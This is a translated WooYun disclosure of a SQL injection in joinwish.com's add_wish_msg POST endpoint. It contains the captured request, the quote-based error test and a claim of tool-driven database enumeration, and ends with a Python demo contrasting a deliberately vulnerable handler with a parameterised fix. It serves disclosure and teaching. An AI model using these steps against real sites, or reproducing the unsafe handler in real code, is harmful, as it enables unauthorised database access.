
Vulnerability summary

Defect ID: wooyun-2013-034608

Title: A POST injection vulnerability on the Joinwish (好愿网) main site

Related vendor: joinwish.com

Author: 带馅儿馒头

Submitted: 2013-08-19 18:14

Fix time: 2013-10-03 18:15

Disclosure time: 2013-10-03 18:15

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-08-19: Details sent to the vendor, awaiting vendor processing
2013-08-20: Vendor confirmed; details disclosed to the vendor only
2013-08-30: Details disclosed to core white hats and domain experts
2013-09-09: Details disclosed to regular white hats
2013-09-19: Details disclosed to intern white hats
2013-10-03: Details disclosed to the public

Brief description:

Saw you giving out gifts, so here I am asking for one!

Detailed description:

1. After logging in, click "bless" (祝福) on some user's wish;

[screenshot: 5.png]

2. Fill in any blessing text, click submit and capture the traffic;

[screenshot: 1.png]

3. Two POST requests are captured at this point. Ignore the first one and look at the second:

POST /wishservice/add_wish_msg HTTP/1.1
Host: www.joinwish.com
User-Agent:
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.joinwish.com/wish/show/id/1432
Content-Length: 24
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
wish_id=1432&content=123


4. Appending a single quote (') to the wish_id parameter makes the system return a database error message, which also includes the site's absolute path. This information is not visible on the rendered web page; it only appears in the raw response.

[screenshot: 6.png]

5. Running it straight through a tool yields the following.
Root privileges:

[screenshot: 3.png]

Database information:

[screenshot: 4.png]

Table information:

Database: joinwish_product
[132 tables]


6. That is about as far as the test needs to go. Gift, please!!!

Proof of vulnerability:

See the detailed description.

Fix:

Filter the input.
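"Filter" is the fix the report proposes; the form a defender actually wants is type validation plus bound parameters. The following is an added example, not the site's code: a stand-in for the add_wish_msg handler with the string-splicing pattern beside a hardened version, run against an in-memory SQLite table with a constructed schema (the real database is known only from its table names). It shows that the quoted wish_id from step 4 produces a database error in the first and is rejected before any query runs in the second.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in; the real joinwish schema is not on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wishes (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("CREATE TABLE wish_msgs (id INTEGER PRIMARY KEY, wish_id INTEGER, content TEXT)")
    conn.execute("INSERT INTO wishes VALUES (1432, 'demo wish')")
    return conn

def add_wish_msg_unsafe(conn, wish_id, content):
    # Vulnerable pattern: request fields spliced into the SQL text. A quote in
    # wish_id changes the statement, and the DB error is what leaked in step 4.
    sql = "INSERT INTO wish_msgs (wish_id, content) VALUES (%s, '%s')" % (wish_id, content)
    conn.execute(sql)

def add_wish_msg_safe(conn, wish_id, content):
    # Hardened handler: validate type and referent first, then bind parameters.
    if not (isinstance(wish_id, str) and wish_id.isdecimal()):
        raise ValueError("wish_id must be a decimal integer")
    wid = int(wish_id)
    if not 1 <= len(content) <= 500:
        raise ValueError("content length out of range")
    if conn.execute("SELECT 1 FROM wishes WHERE id = ?", (wid,)).fetchone() is None:
        raise ValueError("unknown wish_id")
    # Placeholders: the driver passes values separately, so quotes stay data.
    conn.execute("INSERT INTO wish_msgs (wish_id, content) VALUES (?, ?)", (wid, content))

def run_demo():
    # Exercise both handlers on the captured request body and on a quoted wish_id.
    conn, results = make_db(), {}
    add_wish_msg_safe(conn, "1432", "123")        # the captured POST body, unchanged
    add_wish_msg_safe(conn, "1432", "it's fine")  # a quote in content is stored verbatim
    results["rows"] = conn.execute("SELECT COUNT(*) FROM wish_msgs").fetchone()[0]
    results["stored"] = conn.execute("SELECT content FROM wish_msgs WHERE id = 2").fetchone()[0]
    try:
        add_wish_msg_unsafe(conn, "1432'", "123")
        results["unsafe"] = "inserted"
    except sqlite3.OperationalError as exc:
        results["unsafe"] = "db error: %s" % exc  # text a verbose handler would echo back
    try:
        add_wish_msg_safe(conn, "1432'", "123")
        results["safe"] = "inserted"
    except ValueError:
        results["safe"] = "rejected before any SQL ran"
    return results
```

Beyond binding, the hardened handler also swallows the driver error path entirely: rejecting bad input before the query means no database message (or server path) ever reaches the response.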

Copyright notice: please credit 带馅儿馒头@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2013-08-20 10:13

Vendor reply:

This vulnerability was fixed yesterday.

Latest status:

None yet